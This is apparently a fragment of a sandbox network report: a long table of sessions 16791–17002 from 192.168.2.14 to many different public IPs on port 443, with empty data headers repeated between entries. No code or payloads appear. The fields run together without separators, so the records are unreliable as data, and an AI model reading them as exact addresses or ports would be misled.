                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16791192.168.2.145507825.166.238.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16792192.168.2.1460970141.61.107.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16793192.168.2.145251462.138.38.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16794192.168.2.144086251.114.25.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16795192.168.2.145357458.123.82.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16796192.168.2.1436016163.113.145.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16797192.168.2.1452436178.233.217.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16798192.168.2.1437728165.136.121.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16799192.168.2.144214097.47.236.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16800192.168.2.144153068.239.7.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16801192.168.2.1450046200.48.136.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16802192.168.2.145304294.143.68.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16803192.168.2.1441262199.107.18.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16804192.168.2.1449814203.175.84.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16805192.168.2.1444532177.191.20.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16806192.168.2.1446432124.200.123.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16807192.168.2.145235085.77.151.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16808192.168.2.1443836139.141.73.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16809192.168.2.144718838.16.131.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16810192.168.2.144693274.27.158.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16811192.168.2.145049641.160.198.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16812192.168.2.1444352181.237.176.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16813192.168.2.1432786213.144.98.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16814192.168.2.1460484114.116.133.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16815192.168.2.145675835.42.40.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16816192.168.2.1433670201.12.148.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16817192.168.2.145581660.52.9.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16818192.168.2.1454954115.233.191.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16819192.168.2.14535661.27.98.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16820192.168.2.145311076.22.103.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16821192.168.2.144920234.201.116.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16822192.168.2.1455414208.235.128.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16823192.168.2.143482657.26.180.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16824192.168.2.1446616166.213.199.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16825192.168.2.14511629.0.70.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16826192.168.2.144005249.210.117.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16827192.168.2.144615846.167.57.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16828192.168.2.14409045.212.56.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16829192.168.2.14527201.13.185.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16830192.168.2.1444930211.71.211.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16831192.168.2.1449994173.33.209.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16832192.168.2.1433938122.178.80.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16833192.168.2.143964857.69.162.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16834192.168.2.1444984146.123.120.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16835192.168.2.143365453.225.150.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16836192.168.2.145802068.236.155.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16837192.168.2.143992037.104.251.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16838192.168.2.144692884.82.27.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16839192.168.2.1435420140.10.49.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16840192.168.2.144486260.166.173.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16841192.168.2.1445792181.105.180.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16842192.168.2.145418843.109.167.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16843192.168.2.145616853.197.171.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16844192.168.2.1447034181.64.71.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16845192.168.2.143759457.147.98.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16846192.168.2.1451892110.15.62.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16847192.168.2.1439616178.162.6.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16848192.168.2.1448894102.131.86.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16849192.168.2.143968624.146.167.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16850192.168.2.1446028183.177.234.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16851192.168.2.1449682194.78.92.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16852192.168.2.144591027.60.159.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16853192.168.2.1439924142.226.197.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16854192.168.2.14443104.176.222.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16855192.168.2.1449234126.162.145.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16856192.168.2.1436606106.208.160.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16857192.168.2.1453996138.155.237.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16858192.168.2.1445734162.236.253.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16859192.168.2.146010667.93.74.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16860192.168.2.145305251.124.200.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16861192.168.2.145880064.74.178.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16862192.168.2.144940073.41.136.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16863192.168.2.1458130142.118.241.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16864192.168.2.1435858168.209.216.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16865192.168.2.1453238125.84.196.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16866192.168.2.144851466.199.201.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16867192.168.2.145230664.10.147.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16868192.168.2.1439712100.21.231.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16869192.168.2.144051834.142.190.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16870192.168.2.1454498203.32.131.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16871192.168.2.1443584200.123.193.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16872192.168.2.145341081.226.32.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16873192.168.2.1446978100.157.73.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16874192.168.2.1455118148.10.218.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16875192.168.2.1459922132.4.1.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16876192.168.2.144638844.152.229.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16877192.168.2.1450832112.242.229.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16878192.168.2.1436482186.192.152.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16879192.168.2.146036663.200.251.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16880192.168.2.143369062.3.76.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16881192.168.2.1448226182.47.190.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16882192.168.2.1438016179.150.164.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16883192.168.2.1442718103.105.149.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16884192.168.2.144627674.189.127.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16885192.168.2.145338284.2.246.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16886192.168.2.144749283.205.194.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16887192.168.2.1442230222.106.16.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16888192.168.2.145999818.190.159.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16889192.168.2.144055489.170.161.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16890192.168.2.1437098159.230.187.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16891192.168.2.1438014175.160.109.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16892192.168.2.1460274122.153.153.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16893192.168.2.1456914188.183.194.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16894192.168.2.143876269.75.52.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16895192.168.2.1435162173.5.192.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16896192.168.2.1439060104.201.49.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16897192.168.2.146068460.243.151.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16898192.168.2.1434376167.20.29.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16899192.168.2.1433794115.230.11.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16900192.168.2.143968824.223.97.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16901192.168.2.143370231.52.156.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16902192.168.2.1452636213.56.78.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16903192.168.2.1446672201.151.75.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16904192.168.2.1456872150.139.216.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16905192.168.2.145488697.61.221.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16906192.168.2.145038877.0.60.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16907192.168.2.1442938161.146.130.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16908192.168.2.144858458.106.187.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16909192.168.2.145669280.253.132.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16910192.168.2.145712094.167.22.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16911192.168.2.1455254196.126.36.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16912192.168.2.144347696.73.53.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16913192.168.2.1453558138.254.93.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16914192.168.2.1439698196.245.207.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16915192.168.2.1445186116.26.208.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16916192.168.2.1449942216.221.194.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16917192.168.2.1451142210.231.60.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16918192.168.2.1434476110.58.147.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16919192.168.2.14351208.146.10.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16920192.168.2.144270671.53.11.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16921192.168.2.1441962195.98.207.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16922192.168.2.14349385.216.69.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16923192.168.2.1433686196.157.23.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16924192.168.2.1442220192.49.138.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16925192.168.2.1440586188.44.202.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16926192.168.2.144050277.48.18.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16927192.168.2.145566281.101.66.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16928192.168.2.1446644204.142.117.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16929192.168.2.143781678.125.83.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16930192.168.2.1458790187.98.255.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16931192.168.2.145681024.49.145.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16932192.168.2.1437416102.224.72.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16933192.168.2.144806896.77.77.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16934192.168.2.1438942211.141.138.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16935192.168.2.144648884.245.121.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16936192.168.2.1449708223.53.66.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16937192.168.2.1442364123.32.216.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16938192.168.2.145590294.201.48.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16939192.168.2.1451048157.65.224.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16940192.168.2.1437622195.108.75.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16941192.168.2.1449566165.154.150.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16942192.168.2.1447862199.121.148.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16943192.168.2.145854092.20.87.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16944192.168.2.1437540107.57.177.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16945192.168.2.1445180143.55.72.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16946192.168.2.143330862.85.145.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16947192.168.2.1460198124.146.32.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16948192.168.2.145667868.126.208.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16949192.168.2.1458694158.61.142.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16950192.168.2.143784813.59.121.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16951192.168.2.1444016118.87.133.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16952192.168.2.1441290178.44.138.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16953192.168.2.1458158154.188.51.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16954192.168.2.144940214.123.110.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16955192.168.2.1445188197.197.117.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16956192.168.2.14505424.255.92.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16957192.168.2.1439220130.145.140.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16958192.168.2.145351268.66.131.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16959192.168.2.1450258195.90.125.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16960192.168.2.1439238184.43.61.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16961192.168.2.145842259.52.48.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16962192.168.2.144096299.93.144.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16963192.168.2.1443878206.52.17.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16964192.168.2.1458166117.132.52.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16965192.168.2.145328438.7.8.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16966192.168.2.144624683.151.129.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16967192.168.2.1452374139.57.130.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16968192.168.2.1446074136.106.4.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16969192.168.2.1458766123.229.74.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16970192.168.2.144805024.28.237.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16971192.168.2.1459138129.86.233.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16972192.168.2.145285095.233.127.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16973192.168.2.1435906107.134.20.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16974192.168.2.143813058.231.70.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16975192.168.2.1446738148.105.16.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16976192.168.2.1456680216.155.248.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16977192.168.2.144665059.156.255.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16978192.168.2.143667814.80.98.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16979192.168.2.143327218.69.123.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16980192.168.2.144458853.132.225.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16981192.168.2.144852267.207.46.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16982192.168.2.144460693.115.144.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16983192.168.2.144826478.194.213.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16984192.168.2.144674869.1.235.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16985192.168.2.1435900135.58.40.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16986192.168.2.1443394133.197.24.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16987192.168.2.1450328218.250.174.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16988192.168.2.1452644102.107.57.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16989192.168.2.1450800191.93.241.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16990192.168.2.1435266194.239.204.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16991192.168.2.1447276194.91.184.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16992192.168.2.1452222101.245.175.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16993192.168.2.1457834158.100.56.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16994192.168.2.143551820.129.217.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16995192.168.2.145092480.171.144.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16996192.168.2.1434692108.248.178.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16997192.168.2.1445184116.26.52.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16998192.168.2.1450372108.43.96.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16999192.168.2.14469668.27.184.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17000192.168.2.1455300204.182.110.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17001192.168.2.1458990173.158.173.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17002192.168.2.1449764173.128.157.76443
                                                        TimestampBytes transferredDirectionData


